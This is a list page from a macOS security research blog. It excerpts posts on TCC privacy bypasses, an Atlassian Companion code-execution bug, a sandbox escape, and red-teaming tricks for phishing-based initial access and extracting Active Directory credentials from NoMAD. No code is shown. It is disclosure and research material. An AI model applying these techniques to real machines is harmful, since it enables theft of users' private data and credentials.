Posts List

TCC bypasses via launch services

Overview of my favorite TCC bypass ever This vulnerability was disclosed at Black Hat Europe 2022 in the talk Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms. The technique used an old Launch Services function LSSetDefaultRoleHandlerForContentType that allowed (without any restrictions) to register arbitrary applications for handling specified UTI handlers. After the UTI handling app registration, the exploit simply opens juicy files (like AddressBook or iMessages database) and TCC happily grants access to them.

Multiple TCC bypasses via SQLite environment variables

Overview These vulnerabilities were disclosed at Black Hat Europe 2022 in the talk Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms. The technique relied on an SQLite environment variable respected by libsqlite3.dylib which made apps using the standard SQLite system API log all the SQL queries. As such queries may contain sensitive user data normally protected by the TCC - I started researching all the problematic occurrences.

ELECTRONizing macOS privacy

Publications This research has been presented at: DEF CON 31 - ELECTRONizing macOS privacy Objective By the Sea - ELECTRONizing macOS Privacy - a New Weapon in Your Red Teaming Armory The backstory In 2019 I wrote a blog post about injecting code to Electron apps to impersonate their TCC permissions. The trick was really simple because at that time the only thing an attacker had to do was to modify one of the Electron app’s HTML files or the whole ASAR.

macOS Atlassian Companion Remote Code Execution

Overview I identified a vulnerability that allowed executing code on victims’ machines after they click the Edit button on a Confluence page when Atlassian Companion is installed on macOS. The Atlassian Companion app enables users to edit Confluence files in their preferred desktop application, then save the file back to Confluence automatically. Source: https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html Exploitation conditions Victim must have Atlassian Companion installed. Victim clicks on the Edit button in Confluence, so the malicious file is opened in the Atlassian Companion App on macOS (standard app behavior).

Bypass TCC via iCloud

Overview These vulnerabilities were first disclosed at TyphoonCon in Seoul during my talk What happens on your Mac, stays on Apple’s iCloud?! Bypassing Mac privacy mechanisms. I found 2 code injection opportunities in iMovie and GarageBand which allowed me impersonating their com.apple.private.icloud-account.access entitlements. Then, I was able to talk to iCloud XPC helper which gave me the user’s iCloud tokens. With these tokens, I was able to get all the data that is synchronized with iCloud and is normally protected via TCC (Contacts, Reminders, Calendars, Location, etc).

macOS Sandbox Escape vulnerability via Terminal

Introduction In 2020 I observed a strange behavior a sandboxed macOS app may launch any application that won’t inherit the main app’s sandbox profile. It was even funnier as the sandboxed app can spawn those new apps with environment variables. I of course reported it to Apple, but I was told that it’s expected behavior. From that time there were at least 2 publicly-disclosed vulnerabilities that exploited the above-mentioned behavior:

macOS Red Teaming: Apple Dev-ID signed Java environment

macOS Red Teaming Tricks series The idea of #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements The trick There were a lot of different code execution & persistence methods on macOS, also those that include delivering your own interpreters/environments like Java. Recently, I found out that Apple’s Transporter app contains a working Java environment. So if you need Java binary signed directly with the Apple Dev-ID certificate go and grab it!

macOS Red Teaming: Initial access via AppleScript URL

macOS Red Teaming Tricks series The idea of #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick This post is about a funny trick that may help you in achieving initial access on a macOS machine. It requires performing advanced phishing but the code execution with built-in TCC bypass is extremely powerful. Let’s go to the point. The Script Editor (/System/Applications/Utilities/Script Editor.

macOS Red Teaming: Bypass TCC with old apps

macOS Red Teaming Tricks series The idea of #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick This post shows how to bypass the macOS privacy framework (TCC) using old app versions. During red teaming engagements sometimes you need access to the Camera/Microphone or files stored on the user’s Desktop. It turns out that on macOS you cannot do this without special permissions that are handled by the TCC framework.

macOS Red Teaming: Get Active Directory credentials from NoMAD

macOS Red Teaming Tricks series This is the first post of the new #macOSRedTeamingTricks series. The idea is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick This post shows how to get AD data, including a user’s login and password from a macOS machine with configured NoMAD. NoMAD helps Mac users bound with AD domains, and from my experience, it is widely used software, particularly in legacy Windows environments.